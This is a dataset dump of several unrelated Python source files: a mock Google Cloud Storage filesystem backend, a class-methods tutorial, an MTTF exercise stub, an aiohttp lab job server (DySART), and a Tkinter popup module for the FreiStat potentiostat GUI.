If you just specify prefix = 'a', you'll get back:
a/1.txt
a/b/2.txt
However, if you specify prefix='a' and delimiter='/', you'll get back:
a/1.txt
Additionally, the same request will return blobs.prefixes populated with:
a/b/
Source: https://cloud.google.com/storage/docs/listing-objects#storage-list-objects-python
"""
if bucket_name not in self.buckets:
raise NotFound
bucket_objects = self.objects.get(bucket_name, {})
if prefix:
# TODO: Still need to implement the last part of the doc string above to
# TODO: populate blobs.prefixes when using a delimiter.
return list(file_object for file_name, file_object in bucket_objects.items()
if file_name.startswith(prefix)
and (not delimiter or delimiter not in file_name[len(prefix+delimiter):]))
else:
return list(bucket_objects.values())
def create_bucket(self, bucket_name, bucket_obj):
"""Create a bucket object representation and save it to the current fs
Arguments:
bucket_name {str} -- Name of the GCS bucket
bucket_obj {dict} -- GCS-like Bucket resource
Returns:
[type] -- [description]
"""
self.buckets[bucket_name] = bucket_obj
self._write_config_to_file()
return bucket_obj
def create_file(self, bucket_name, file_name, content, file_obj):
"""Create a text file given a string content
Arguments:
bucket_name {str} -- Name of the bucket to save to
file_name {str} -- File name used to store data
content {bytes} -- Content of the file to write
file_obj {dict} -- GCS-like Object resource
"""
file_dir = self._get_or_create_dir(bucket_name, file_name)
base_name = fs.path.basename(file_name)
with file_dir.open(base_name, mode="wb") as file:
file.write(content)
bucket_objects = self.objects.get(bucket_name, {})
bucket_objects[file_name] = file_obj
self.objects[bucket_name] = bucket_objects
self._write_config_to_file()
def create_resumable_upload(self, bucket_name, file_name, file_obj):
"""Initiate the necessary data to support partial upload.
This doesn't fully support partial upload, but expect the secondary PUT
call to send all the data in one go.
Basically, we try to comply to the bare minimum to the API described in
https://cloud.google.com/storage/docs/performing-resumable-uploads ignoring
any potential network failures
Arguments:
bucket_name {string} -- Name of the bucket to save to
file_name {string} -- File name used to store data
file_obj {dict} -- GCS Object resource
Returns:
str -- id of the resumable upload session (`upload_id`)
"""
file_id = "{}:{}:{}".format(bucket_name, file_name, datetime.datetime.now())
self.resumable[file_id] = file_obj
self._write_config_to_file()
return file_id
def create_file_for_resumable_upload(self, file_id, content):
"""Create a binary file following a partial upload request
This also updates the meta with the final file-size
Arguments:
file_id {str} -- the `upload_id` of the partial upload session
content {bytes} -- raw content to add to the file
Returns:
dict -- GCS-like Object resource
"""
file_obj = self.resumable[file_id]
bucket_name = file_obj["bucket"]
file_name = file_obj["name"]
file_dir = self._get_or_create_dir(bucket_name, file_name)
base_name = fs.path.basename(file_name)
with file_dir.open(base_name, mode="wb") as file:
file.write(content)
file_obj["size"] = str(len(content))
bucket_objects = self.objects.get(bucket_name, {})
bucket_objects[file_name] = file_obj
self.objects[bucket_name] = bucket_objects
del self.resumable[file_id]
self._write_config_to_file()
return file_obj
def get_file_obj(self, bucket_name, file_name):
"""Gets the meta information for a file within a bucket
Arguments:
bucket_name {str} -- Name of the bucket
file_name {str} -- File name
Raises:
NotFound: Raised when the object doesn't exist
Returns:
dict -- GCS-like Object resource
"""
try:
return self.objects[bucket_name][file_name]
except KeyError:
raise NotFound
def get_file(self, bucket_name, file_name):
"""Get the raw data of a file within a bucket
Arguments:
bucket_name {str} -- Name of the bucket
file_name {str} -- File name
Raises:
NotFound: Raised when the object doesn't exist
Returns:
bytes -- Raw content of the file
"""
try:
bucket_dir = self._fs.opendir(bucket_name)
return bucket_dir.open(file_name, mode="rb").read()
except (FileExpected, ResourceNotFound) as e:
logger.error("Resource not found:")
logger.error(e)
raise NotFound
def delete_bucket(self, bucket_name):
"""Delete a bucket's meta and file
Arguments:
bucket_name {str} -- GCS bucket name
Raises:
NotFound: If the bucket doesn't exist
Conflict: If the bucket is not empty or there are pending uploads
"""
bucket_meta = self.buckets.get(bucket_name)
if bucket_meta is None:
raise NotFound("Bucket with name '{}' does not exist".format(bucket_name))
bucket_objects = self.objects.get(bucket_name, {})
if len(bucket_objects.keys()) != 0:
raise Conflict("Bucket '{}' is not empty".format(bucket_name))
resumable_ids = [
file_id
for (file_id, file_obj) in self.resumable.items()
if file_obj.get('bucket') == bucket_name
]
if len(resumable_ids) != 0:
raise Conflict("Bucket '{}' has pending upload sessions".format(bucket_name))
del self.buckets[bucket_name]
self._delete_dir(bucket_name)
self._write_config_to_file()
def delete_file(self, bucket_name, file_name):
try:
self.objects[bucket_name][file_name]
except KeyError:
raise NotFound("Object with name '{}' does not exist in bucket '{}'".format(bucket_name, file_name))
del self.objects[bucket_name][file_name]
self._delete_file(bucket_name, file_name)
self._write_config_to_file()
def _delete_file(self, bucket_name, file_name):
try:
with self._fs.opendir(bucket_name) as bucket_dir:
bucket_dir.remove(file_name)
except ResourceNotFound:
logger.info("No file to remove '{}/{}'".format(bucket_name, file_name))
def _delete_dir(self, path, force=True):
try:
remover = self._fs.removetree if force else self._fs.removedir
remover(path)
except ResourceNotFound:
logger.info("No folder to remove '{}'".format(path))
def wipe(self, keep_buckets=False):
existing_buckets = self.buckets
self.buckets = {}
self.objects = {}
self.resumable = {}
try:
self._fs.remove('.meta')
for path in self._fs.listdir('.'):
self._fs.removetree(path)
except ResourceNotFound as e:
logger.warning(e)
if keep_buckets:
for k, v in existing_buckets.items():
self.create_bucket(k, v)
| StarcoderdataPython |
4804006 | """
Copyright (c) 2020, <NAME>.
Distributed under the terms of the MIT License.
The full license is in the file LICENSE, distributed with this software.
Created on Feb 21, 2020
@author
"""
class User:
a_pay = 15000 # class variables.
b_pay = 21000
def __init__(self, value):
self.list = []
self.dict = {}
self.pay = 500
self.value = value
def modifying(self, *args, **kwargs):
self.list = list(args) # updating 'self.list'.
for i, j in kwargs.items():
print(i, j, end='\n')
self.dict = kwargs # updating 'self.dict'.
return self.list, self.dict
def __str__(self): # so 'str(self)' can now be applied.
return f'The list is: {self.list} and the dictionary is: {self.dict}.'
# returns the updated 'self.list' and 'self.dict'.
@classmethod
def modvar_class(cls, c_pay): # it is responsible for operating
# class variables.
tol_var = (cls.a_pay + cls.b_pay + c_pay)
return f"Total value of their pays: {tol_var}."
@classmethod
def calling_class(cls, another_value): # its job is to pass its argument
# to the class itself.
return cls(another_value)
@staticmethod
def pass_func(*args): # it does't have any relation to
# object instance or class instance.
return sum(args)
u1 = User(500) # '500' sets as the value of 'self.value', where 'u1'='self'.
print(u1) # it prints all dunders inside
print(u1.value)
print(u1.modifying(10, 40, my_name='Souvik', language='Python'))
print(u1) # after modifying it prints dunder...
print(User.modvar_class(16000))
u2 = u1.calling_class(1000) # '500' is overwritten by '1000' here.
print(u2.value) # overwritten value of 'self.value'.
u3 = User.calling_class(2000) # it passes its argument and newly sets 'self.value'.
print(u3.value) # then, it prints the updated 'self.value'.
print(User.pass_func(10, 20, 30))
## can also be written as....
print(u2.pass_func(40, 50, 60))
print(str(u1)) # it works as __str__() defined in the class
print(u1.__str__()) # same condition as above..
## otherwise, 'it raises AttributeError' if '__str__()' was not defined.
print(User.__str__(u1)) # also applicable.
print(u2.modifying(20, 30, name='<NAME>', role='Python Creator'))
print(u2)
print(str(u2))
print(u2.__str__())
print(User.__str__(u2))
| StarcoderdataPython |
3228161 | import csv
class MTTFCalculator:
def __init__(self):
self.failures = []
self.read_from_file()
def calculate_mttf(self):
# TODO Berechne den Mittelwert der in "failures" gespeicherten Werte und gebe das Ergebnis zurueck.
# Tipp: Hierzu benoetigst du die "return"-Anweisung.
# Das pass kannst du loeschen, sobald du deinen Code schreibst.
len(self.failures)
pass
def write_to_file(self):
"""Hier wird die failures Liste in eine CSV Datei geschrieben"""
logfile = open("logfile.csv", 'w', newline='')
wr = csv.writer(logfile,dialect=csv.excel)
wr.writerows([list(range(1,len(self.failures)+1)), self.failures])
def read_from_file(self):
"""Hier wird zu beginn geschaut, ob es eine logfile gibt.
Wenn ja, wird diese ausgelesen und die Werte in failures gespeichert"""
try:
logfile = open ("logfile.csv", "r")
rows = list(csv.reader(logfile, dialect=csv.excel))
if(len(rows)>1):
for entry in rows[1]:
self.failures.append(int(entry))
except:
print("No Logfile Found") | StarcoderdataPython |
1723729 | # -*- coding: utf-8 -*-
"""
Author: mcncm 2019
DySART job server
currently using http library; this should not be used in production, as it's
not really a secure solution with sensible defaults. Should migrate to Apache
or Nginx as soon as I understand what I really want.
Why am I doing this?
* Allows multiple clients to request jobs
* Allows new _kinds_ of clients, like "cron" services and web clients (which
Simon is now asking about)
* Keeps coupling weakish between user and database; probably a good strategy.
TODO
* loggin'
* login
* when the scheduler is shut down, it should die gracefully: preferably dump its
job queue to a backup file on the database, and recover from this on startup.
Still-open question: how is the request formulated? I imagine that it's basically
python code that the server evaluates. But this is literally the most insecure
thing you can do. So, it needs to be a very restricted subset. Ideally, it would
be sort of good if you're only allowed to call methods on features and have some
value returned.
"""
import functools
from io import StringIO
import json
import pickle
import sys
from dysart.feature import exposed, CallRecord
from dysart.records import RequestRecord
import dysart.messages.messages as messages
from dysart.messages.errors import *
import dysart.project as project
import dysart.services.service as service
from dysart.services.database import Database
import toplevel.conf as conf
import aiohttp.web as web
import mongoengine as me
# TEMPORARY
from dysart.equs_std.equs_features import *
def process_request(coro):
"""Wraps a session handler coroutine to perform authentication; also
injects internal request type.
Args:
coro: A coroutine function, notionally an HTTP request handler.
Returns:
A coroutine function, notionally an HTTP request handler.
Todo:
Need to figure out how to unwrap the response to persist its body
in the RequestRecord
"""
@functools.wraps(coro)
async def wrapped(self, request):
await self.authorize(request)
text = await request.text()
request = RequestRecord(
remote=request.remote,
path=request.path,
text=text
)
return await coro(self, request)
return wrapped
class Dyserver(service.Service):
def __init__(self, start_db=False):
"""Start and connect to standard services
"""
self.host = conf.config['server_host']
self.port = int(conf.config['server_port'])
self.db_host = conf.config['db_host']
self.db_port = conf.config['db_port']
self.labber_host = conf.config['labber_host']
self.logfile = os.path.join(
conf.dys_path,
conf.config['logfile_name']
)
if start_db or 'start_db' in conf.config['options']:
self.db_server = Database('database')
self.db_server.start()
self.app = web.Application()
self.setup_routes()
# TODO marked for deletion
def is_running(self) -> bool:
return hasattr(self, 'httpd')
def _start(self) -> None:
"""Connects to services and runs the server continuously"""
self.db_connect(self.db_host, self.db_port)
self.labber_connect(self.labber_host)
web.run_app(self.app, host=self.host, port=self.port)
if hasattr(self, 'db_server'):
self.db_server.stop()
def _stop(self) -> None:
"""Ends the server process"""
if hasattr(self, 'db_server'):
self.db_server.stop()
def db_connect(self, host_name, host_port) -> None:
"""Sets up database client for python interpreter.
"""
with messages.StatusMessage('{}connecting to database...'.format(messages.TAB)):
try:
self.db_client = me.connect(conf.config['default_db'], host=host_name, port=host_port)
# Do the following lines do anything? I actually don't know.
sys.path.pop(0)
sys.path.insert(0, os.getcwd())
except Exception as e: # TODO
self.db_client = None
raise ConnectionError
def labber_connect(self, host_name) -> None:
"""Sets a labber client to the default instrument server.
"""
with messages.StatusMessage('{}Connecting to instrument server...'.format(messages.TAB)):
try:
with LabberContext():
labber_client = Labber.connectToServer(host_name)
# Pokemon exception handling generally frowned upon, but I'm not
# sure how to catch both a ConnectionError and an SG_Network.Error.
except ConnectionError as e:
labber_client = None
raise ConnectionError
finally:
self.labber_client = labber_client
def job_scheduler_connect(self) -> None:
self.job_scheduler = jobscheduler.JobScheduler()
self.job_scheduler.start()
def load_project(self, project_path: str):
"""Loads a project into memory, erasing a previous project if it
existed.
"""
self.project = project.Project(project_path)
async def authorize(self, request):
"""Auth for an incoming HTTP request. In the future this will probably
do some more elaborate three-way handshake; for now, it simply checks
the incoming IP address against a whitelist.
Args:
request:
Raises:
web.HTTPUnauthorized
"""
if request.remote not in conf.config['whitelist']:
raise web.HTTPUnauthorized
async def refresh_feature(self, feature, request: RequestRecord):
"""
Args:
feature: the feature to be refreshed
Todo:
Schedule causally-independent features to be refreshed
concurrently. This should just execute them serially.
At some point in the near future, I'd like to implement
a nice concurrent graph algorithm that lets the server
keep multiple refreshes in flight at once.
"""
scheduled_features = await feature.expired_ancestors()
for scheduled_feature in scheduled_features:
record = CallRecord(scheduled_feature, request)
await scheduled_feature.exec_feature(record)
@process_request
async def feature_get_handler(self, request: RequestRecord):
"""Handles requests that only retrieve data about Features.
For now, it simply retrieves the values of all `refresh`
methods attached to the Feature.
Args:
request:
Returns: A json object with the format,
{
'name': name,
'id': id,
'results': {
row_1: val_1,
...
row_n: val_n
}
}
"""
data = request.json
try:
feature_id = self.project.feature_ids[data['feature']]
feature = self.project.features[feature_id]
except KeyError:
raise web.HTTPNotFound(
reason=f"Feature {data['feature']} not found"
)
response_data = feature._repr_dict_()
response_data['name'] = data['feature']
return web.Response(body=json.dumps(response_data))
@process_request
async def feature_post_handler(self, request: RequestRecord):
"""Handles requests that may mutate state.
Args:
request: request data is expected to have the fields,
`project`, `feature`, `method`, `args`, and `kwargs`.
Returns:
"""
data = request.json
# Rolling my own remote object protocol...
try:
feature_id = self.project.feature_ids[data['feature']]
feature = self.project.features[feature_id]
except KeyError:
raise web.HTTPNotFound(
reason=f"Feature {data['feature']} not found"
)
method = getattr(feature, data['method'], None)
if not isinstance(method, exposed):
# This exception will be raised if there is no such method *or* if
# the method is unexposed.
raise web.HTTPNotFound(
reason=f"Feature {data['feature']} has no method {data['method']}"
)
if hasattr(method, 'is_refresh'):
await self.refresh_feature(feature, request)
print(f"Calling method `{data['method']}` of feature `{data['feature']}`")
return_value = method(*data['args'], **data['kwargs'])
return web.Response(body=pickle.dumps(return_value))
@process_request
async def project_post_handler(self, request: RequestRecord):
"""Handles project management-related requests. For now,
this just loads/reloads the sole project in server memory.
Args:
request: request data is expected to have the field,
`project`.
Returns:
"""
data = request.json
def exposed_method_names(feature_id: str):
return [m.__name__ for m in
self.project.features[feature_id].exposed_methods()]
try:
print(f"Loading project `{data['project']}`")
self.load_project(conf.config['projects'][data['project']])
proj = self.project
graph = proj.feature_graph()
body = {
'graph': graph,
'features': {
name: exposed_method_names(feature_id)
for name, feature_id in proj.feature_ids.items()
}
}
response = web.Response(body=json.dumps(body))
except KeyError:
response = web.HTTPNotFound(
reason=f"Project {data['project']} not found"
)
return response
@process_request
async def debug_handler(self, request: RequestRecord):
"""A handler invoked by a client-side request to transfer control
of the server process to a debugger. This feature should be disabled
without admin authentication
Args:
request:
Returns:
"""
print('Running debug handler!')
breakpoint()
pass # A reminder that nothing is supposed to happen
return web.Response()
def setup_routes(self):
self.app.router.add_post('/feature', self.feature_post_handler)
self.app.router.add_get('/feature', self.feature_get_handler)
self.app.router.add_post('/project', self.project_post_handler)
self.app.router.add_post('/debug', self.debug_handler)
class LabberContext:
"""A context manager to wrap connections to Labber and capture errors
"""
def __enter__(self):
sys.stdout = sys.stderr = self.buff = StringIO()
def __exit__(self, exc_type, exc_value, traceback):
sys.stdout, sys.stderr = sys.__stdout__, sys.__stderr__ # restore I/O
if self._error():
raise ConnectionError
def _error(self) -> bool:
"""Checks if an error condition is found in temporary I/O buffer"""
return 'Error' in self.buff.getvalue()
| StarcoderdataPython |
1760258 | <filename>Python/FreiStat_GUI/PopUp_Window/__init__.py<gh_stars>0
"""
PopUp window class of the FreiStat interface.
"""
__author__ = "<NAME>"
__contact__ = "University of Freiburg, IMTEK, <NAME>"
__credits__ = "<NAME>"
__version__ = "1.0.0"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>, <EMAIL>"
# Import dependencies
from tkinter import *
from tkinter.ttk import *
from FreiStat.Data_storage.constants import *
import FreiStat as FS
import FreiStat_GUI as FS_GUI
from numpy import var
# Import internal dependencies
from ..Data_Storage.constants import *
from ..Data_Storage.dictionaries import *
from ..Data_Storage.data_handling import DataHandling
class FreiStatPopUp():
"""
Description
-----------
Class for implementing the PopUp windows of the FreiStat interface
"""
from .Events import _on_rightclick
from .Events import _on_rightclick_release
from .Events import _bound_MouseWheel
from .Events import _unbound_MouseWheel
from .Events import _onMouseWheel
from .Widgets import _clickCheckButton
from .Widgets import _clickExport
from .Widgets import _clickImport
from .Widgets import _clickSelect
def __init__(self, iCenterX : int, iCenterY : int) -> None:
"""
Description
-----------
Constructor of the class FreiStatPopUp.
"""
# Intialize class variables
self._iCenterX = iCenterX
self._iCenterY = iCenterY
# Load image
self._logo = PhotoImage(file= __path__[0] +
"./../assets/logo/FreiStat.gif")
self._initWindow()
def _initWindow(self) -> None:
"""
Description
-----------
Intialize the actual window
"""
# Create root window object
self._PopUpRoot = Toplevel()
self._PopUpRoot.withdraw()
self._PopUpRoot.protocol("WM_DELETE_WINDOW", self._on_Closing)
self._PopUpRoot.resizable(FALSE, FALSE)
# Set title of the window
self._PopUpRoot.title("FreiStat")
# Set logo of the window
self._PopUpRoot.tk.call('wm', 'iconphoto', self._PopUpRoot._w, self._logo)
self._PopUpRoot.geometry(f'{PW_X_POSITION}x{PW_Y_POSITION}+{self._iCenterX + 50}+{self._iCenterY + 50}')
def PopUp_Help(self) -> None:
"""
Description
-----------
Create a PopUp window for the help setting
"""
# Check if window is open and just hidden
try:
# Unhide window
self._PopUpRoot.geometry(f'{2*PW_X_POSITION}x{PW_Y_POSITION}+{self._iCenterX + 50}+{self._iCenterY + 50}')
self._PopUpRoot.overrideredirect(0)
self._PopUpRoot.deiconify()
self._clearFrame(self._PopUpRoot)
# Set title of the window
self._PopUpRoot.title("Help")
except:
# Create new window
self._initWindow()
self._PopUpRoot.deiconify()
self._TabControl = Notebook(self._PopUpRoot)
tab1 = Frame(self._TabControl)
tab2 = Frame(self._TabControl)
tab3 = Frame(self._TabControl)
tab4 = Frame(self._TabControl)
tab5 = Frame(self._TabControl)
self._TabControl.add(tab1, text = "General")
self._TabControl.add(tab2, text = "Single Mode")
self._TabControl.add(tab3, text = "Sequence Mode")
self._TabControl.add(tab4, text = "Templates")
self._TabControl.add(tab5, text = "Data Export")
self._TabControl.pack(expand = TRUE, fill ="both")
# General
for iIndex in range(len(dic_helpText[GENERAL])):
helpText = Label(tab1, text= dic_helpText[GENERAL][iIndex],
style= "fLabelGeneralBold.TLabel")
helpText.pack(fill ="both", side= TOP)
# Single Mode
for iIndex in range(len(dic_helpText[SINGLE_MODE])):
helpText = Label(tab2, text= dic_helpText[SINGLE_MODE][iIndex],
style= "fLabelGeneralBold.TLabel")
helpText.pack(fill ="both", side= TOP)
# Sequence Mode
for iIndex in range(len(dic_helpText[SEQUENCE_MODE])):
helpText = Label(tab3, text= dic_helpText[SEQUENCE_MODE][iIndex],
style= "fLabelGeneralBold.TLabel")
helpText.pack(fill ="both", side= TOP)
# Templates
for iIndex in range(len(dic_helpText[TEMPLATES])):
helpText = Label(tab4, text= dic_helpText[TEMPLATES][iIndex],
style= "fLabelGeneralBold.TLabel")
helpText.pack(fill ="both", side= TOP)
# Data Export
for iIndex in range(len(dic_helpText[DATA_EXPORT])):
helpText = Label(tab5, text= dic_helpText[DATA_EXPORT][iIndex],
style= "fLabelGeneralBold.TLabel")
helpText.pack(fill ="both", side= TOP)
def PopUp_About(self) -> None:
"""
Description
-----------
Create a PopUp window for the about setting
"""
# Check if window is open and just hidden
try:
# Unhide window
self._PopUpRoot.geometry(f'{PW_X_POSITION}x{PW_Y_POSITION}+{self._iCenterX + 50}+{self._iCenterY + 50}')
self._PopUpRoot.overrideredirect(0)
self._PopUpRoot.deiconify()
self._clearFrame(self._PopUpRoot)
# Set title of the window
self._PopUpRoot.title("About")
except:
# Create new window
self._initWindow()
self._PopUpRoot.deiconify()
# Create frame information
fVersionFrame = Frame(self._PopUpRoot, style="fPopUp.TFrame")
fVersionFrame.pack(fill= 'both', side= TOP, expand= True)
self._TextLogo = PhotoImage(file= __path__[0] + "./../assets/logo/FreiStat.png")
self._TextLogo = self._TextLogo.subsample(4)
TextLogoFreiStat = Label(fVersionFrame, image= self._TextLogo,
style= "fLabelGeneralWhite.TLabel")
TextLogoFreiStat.pack(side= TOP, expand= FALSE, padx= 5, pady= 5)
# FreiStat-GUI
TextGeneral = Label(fVersionFrame, text= FS_GUI.__name__, width= 100,
style= "fLabelGeneralWhiteSmallBold.TLabel")
TextGeneral.pack(side= TOP, padx= 5, pady= 5)
TextVersion = Label(fVersionFrame, width= 100,
text= "Version: {0}".format(FS_GUI.__version__),
style= "fLabelGeneralWhiteSmallBold.TLabel")
TextVersion.pack(side= TOP, padx= 5, pady= 5)
# FreiStat-Framework
TextGeneral = Label(fVersionFrame, text= FS.__name__, width= 100,
style= "fLabelGeneralWhiteSmallBold.TLabel")
TextGeneral.pack(side= TOP, padx= 5, pady= 5)
TextVersion = Label(fVersionFrame, width= 100,
text= "Version: {0}".format(FS.__version__),
style= "fLabelGeneralWhiteSmallBold.TLabel")
TextVersion.pack(side= TOP, padx= 5, pady= 5)
def PopUp_TemplateHandler(self,
iCommandID : int,
dataHandling : DataHandling,
listDataStorage : list,
strFilePath: str) -> None:
"""
Description
-----------
Create a PopUp window for handling template import/ export management
Parameters
----------
`iCommandID` : int
Integer indicating command (0 Import | 1 Export)
`dataHandling` : DataHandling
Reference to the dataHandling object
`listDataStorage` : list
List containing all loaded data storage objects
`strFilePath` : str
String containing the path to the import/ export location
"""
# Check if window is open and just hidden
try:
# Unhide window
self._PopUpRoot.geometry(f'{1000}x{600}+{self._iCenterX + 50}+{self._iCenterY + 50}')
self._PopUpRoot.overrideredirect(0)
self._PopUpRoot.deiconify()
self._clearFrame(self._PopUpRoot)
# Set title of the window
self._PopUpRoot.title("Template management")
except:
# Create new window
self._initWindow()
self._PopUpRoot.deiconify()
# Save reference to dataHandling object
self._dataHandling = dataHandling
# Save reference to imported dataStorage objects
self._listDataStorage = listDataStorage
# Create lists to hold IntVar references
self._tempList : list = []
self._templateList : list = []
# Create list to hold template frame reference
self._templateFrameList : list = []
self._buttonList : list = []
self._templateNameList : list = []
# Save import/ export path
self._strFilePath = strFilePath
# Create a canvas window
canvasFrame = Canvas(self._PopUpRoot, background= "gray95",
borderwidth= 0, highlightthickness= 0)
# Create a scrollbar
scrollbarCentral=Scrollbar(self._PopUpRoot, orient="vertical",
command= canvasFrame.yview)
scrollbarCentral.pack(side= RIGHT, fill= Y)
canvasFrame.pack(fill= "both", expand= True, side= TOP)
# Add scroll command to canvas
canvasFrame.configure(yscrollcommand= scrollbarCentral.set)
fMainFrame = Frame(canvasFrame, style="fPopUpTemplate.TFrame")
fMainFrame.pack(fill= "both", side= TOP, expand= True, padx= 1)
# Update windows to get correct size informations
canvasFrame.create_window((0,0), window= fMainFrame,
anchor= NW, width= 985, height= len(listDataStorage) * 500)
# Bind mousewheel scroll to frames
fMainFrame.bind("<Enter>", lambda event,
frame = fMainFrame, canvas = canvasFrame :
self._bound_MouseWheel(event, frame, canvas))
fMainFrame.bind("<Leave>", lambda event,
frame = canvasFrame : self._unbound_MouseWheel(event, frame))
# Loop over every data storage entry
for iIndex in range(len(listDataStorage)):
self._DisplayTemplate(fMainFrame, iIndex, False,
listDataStorage[iIndex].get_TemplateName(),
listDataStorage[iIndex].get_ExperimentType(),
listDataStorage[iIndex].get_ExperimentParameters())
fRibbonFrame = Frame(self._PopUpRoot, style="fMenuBand.TFrame",
relief= RAISED)
fRibbonFrame.pack(fill= "both", side= BOTTOM)
if (iCommandID == IMPORT_TEMPLATE):
ButtonContinue = Button(fRibbonFrame, text= "Import templates",
command= lambda : self._clickImport())
ButtonContinue.pack(side= RIGHT, padx = 5, pady= 5)
elif (iCommandID == EXPORT_TEMPLATE):
ButtonContinue = Button(fRibbonFrame, text= "Export templates",
command= lambda : self._clickExport())
ButtonContinue.pack(side= RIGHT, padx = 5, pady= 5)
def _DisplayTemplate(self, parentFrame : Frame,
index : int,
bRecursionCall : bool,
templateName : str,
experimentType : str,
experimentParameter : list) -> None:
"""
Description
-----------
Method to display template in popup window
Parameters
----------
`parentFrame` : Frame
Reference to frame in which the template should be shown
`index` : int
Index indicating the position of the template in the list
`bRecursionCall` : bool
Flag indicating if the method displayed is part of a sequence
`templateName` : str
Name of the template
`experimentType` : str
Experiment type used
`experimentParameter` : list
List containing the experiment parameters
"""
fTemplateFrame = Frame(parentFrame, style="fPopUp.TFrame")
fTemplateFrame.pack(fill= 'both', side= TOP, padx= 1, pady= 5)
# Create subframe for general template information
fTemplateGeneralFrame = Frame(fTemplateFrame, style="fPopUp.TFrame")
fTemplateGeneralFrame.pack(fill= 'both', side= TOP, padx= 1, pady= 1)
templateIntVar = IntVar()
if(not bRecursionCall):
# Checkbutton for expanding method parameters
ButtonTemplate = Checkbutton(fTemplateGeneralFrame, onvalue= True,
offvalue= False, style="fCheckButtonGeneral.TCheckbutton",
variable= templateIntVar, command= lambda index= index :
self._clickCheckButton(index))
ButtonTemplate.pack(side= LEFT, fill= Y, padx = 5, pady= 5)
self._templateList.append(templateIntVar)
else :
# Insert spacer element
fSpacerFrame = Frame(fTemplateGeneralFrame, style= "fPopUp.TFrame")
fSpacerFrame.pack(fill= Y, side= LEFT, expand= FALSE, padx= 15, pady= 5)
# Label for ec-method
TextMethodName= Label(fTemplateGeneralFrame,
text= experimentType,
width= TEXTBOX_WIDTH_SMALL, style= "fLabelGeneralWhiteSmallBold.TLabel")
TextMethodName.pack(side= LEFT, pady= 5)
# Label for displaying the template name
TextTemplate= Label(fTemplateGeneralFrame,
text= dic_parameters[TEMPLATE_NAME][0],
width= TEXTBOX_WIDTH_SMALL, style= "fLabelGeneralWhiteSmallBold.TLabel")
TextTemplate.pack(side= LEFT, padx= 5, pady= 5)
if(not bRecursionCall):
# Entry for the template name which is placed in separate frame
strTemplate = StringVar()
strTemplate.set(templateName)
fBorderFrameEntry = Frame(fTemplateGeneralFrame, style="fPopUpSunken.TFrame")
fBorderFrameEntry.pack(fill= 'both', side= LEFT, pady= 5)
EntryTemplate = Entry(fBorderFrameEntry, textvariable= strTemplate,
width= TEXTBOX_WIDTH, style= "fLabelGeneralRedSmallBold.TLabel")
EntryTemplate.pack(side= LEFT, padx= 3)
self._templateNameList.append(strTemplate)
# Border frame for button
# (deprecated but can be used to give color frame to button)
fBorderFrameButton = Frame(fTemplateGeneralFrame, style="fPopUp.TFrame")
fBorderFrameButton.pack(fill= 'both', side= RIGHT, padx= 2, pady= 2)
ButtonShowExpPara = Button(fBorderFrameButton, text= "Show",
command= lambda index= index: self._clickSelect(index))
ButtonShowExpPara.pack(side= RIGHT, fill= Y, padx= 3, pady= 3)
self._buttonList.append([ButtonShowExpPara, False])
# Create subframe for display of experiment setup
fTemplateParameterFrame = Frame(fTemplateFrame, style="fWidget.TFrame")
self._templateFrameList.append(fTemplateParameterFrame)
else :
EntryTemplate = Label(fTemplateGeneralFrame, text= templateName,
width= TEXTBOX_WIDTH, style= "fLabelGeneralWhiteSmallBold.TLabel")
EntryTemplate.pack(side= LEFT, padx= 3, pady= 2)
fTemplateParameterFrame = Frame(fTemplateFrame, style="fWidget.TFrame")
fTemplateParameterFrame.pack(fill= "both", side= "top", padx= 1, pady= 5)
if (experimentType == SEQUENCE):
# Make a recursion call for every method in the sequnece
for iIndex in range(len(experimentParameter)):
self._DisplayTemplate(fTemplateParameterFrame, iIndex, True,
experimentParameter[iIndex][1],
experimentParameter[iIndex][0],
experimentParameter[iIndex][2])
else:
# Loop over all experiment parameters
for iIndex in range(len(experimentParameter)):
# Create a subsubframe for an experiment parameter pair
fParameterFrame = Frame(fTemplateParameterFrame, style="fPopUp.TFrame")
fParameterFrame.pack(fill= 'both', side= TOP, padx= 1)
# Label for displaying the name of the experiment parameter
TextParameter= Label(fParameterFrame,
text= dic_parameters[experimentParameter[iIndex][0]][0],
width= TEXTBOX_WIDTH, style= "fLabelGeneralWhiteSmall.TLabel")
TextParameter.pack(side= LEFT, padx= 35, pady= 5)
# Create suiting representation for every parameter
if (experimentParameter[iIndex][0] in
{MAINS_FILTER, ENABLE_OPTIMIZER, LOW_PERFORMANCE_MODE}):
tempIntVar = IntVar()
tempIntVar.set(experimentParameter[iIndex][1])
self._tempList.append(tempIntVar)
EntryParameter = Checkbutton(fParameterFrame, state= DISABLED,
style="fCheckButtonGeneral.TCheckbutton",
variable= tempIntVar, onvalue= True, offvalue= False )
EntryParameter.pack(side= LEFT, fill= Y, padx = 5, pady= 5)
else :
TextValue= Label(fParameterFrame, width= TEXTBOX_WIDTH,
text= str(experimentParameter[iIndex][1]),
style= "fLabelGeneralWhiteSmall.TLabel")
TextValue.pack(side= LEFT, padx= 5, pady= 5)
def PopUp_Tooltip(self, entry : str) -> None:
"""
Description
-----------
Create a PopUp window for the tool tip for every entry
"""
# Check if window is open and just hidden
try:
# Unhide window
self._PopUpRoot.overrideredirect(0)
self._PopUpRoot.deiconify()
self._clearFrame(self._PopUpRoot)
except:
# Create new window
self._initWindow()
self._PopUpRoot.deiconify()
self._PopUpRoot.overrideredirect(1)
# Create frame information
fTooltipFrame = Frame(self._PopUpRoot, style="fPopUp.TFrame")
fTooltipFrame.pack(fill= 'both', side= TOP, padx= 1, pady= 1)
TextGeneral = Label(fTooltipFrame, text= dic_parameters[entry][1],
width= PW_X_POSITION - 5, wraplengt= PW_X_POSITION - 5,
style= "fLabelGeneralWhiteSmall.TLabel")
TextGeneral.pack(side= TOP, padx= 2, pady= 2)
self._PopUpRoot.geometry(f'{PW_X_POSITION}x{TextGeneral.winfo_reqheight() + 6}+{self._PopUpRoot.winfo_pointerx() + 5}+{self._PopUpRoot.winfo_pointery() + 5}')
def _clearFrame(self, frame : Frame) -> None:
"""
Description
-----------
Helper method for clearing given frame of all widgets
Parameters
----------
`frame` : Frame
Frame which should be cleared
"""
# Get list of all widgets in the Frame
listWidget : list = frame.pack_slaves()
# Loop over all widgets
for widget in listWidget:
widget.destroy()
def _on_Closing(self):
"""
Description
-----------
On closing event for the popup window.
"""
self._PopUpRoot.withdraw() | StarcoderdataPython |
133204 | import sys
sys.path.append('..')
from utils import *
class Cascade:
# --------------------------
# Initiate Cascade
# --------------------------
def __init__(self, root_tweet_id, cascade_path, label=None):
self.file_id = root_tweet_id # For label.txt
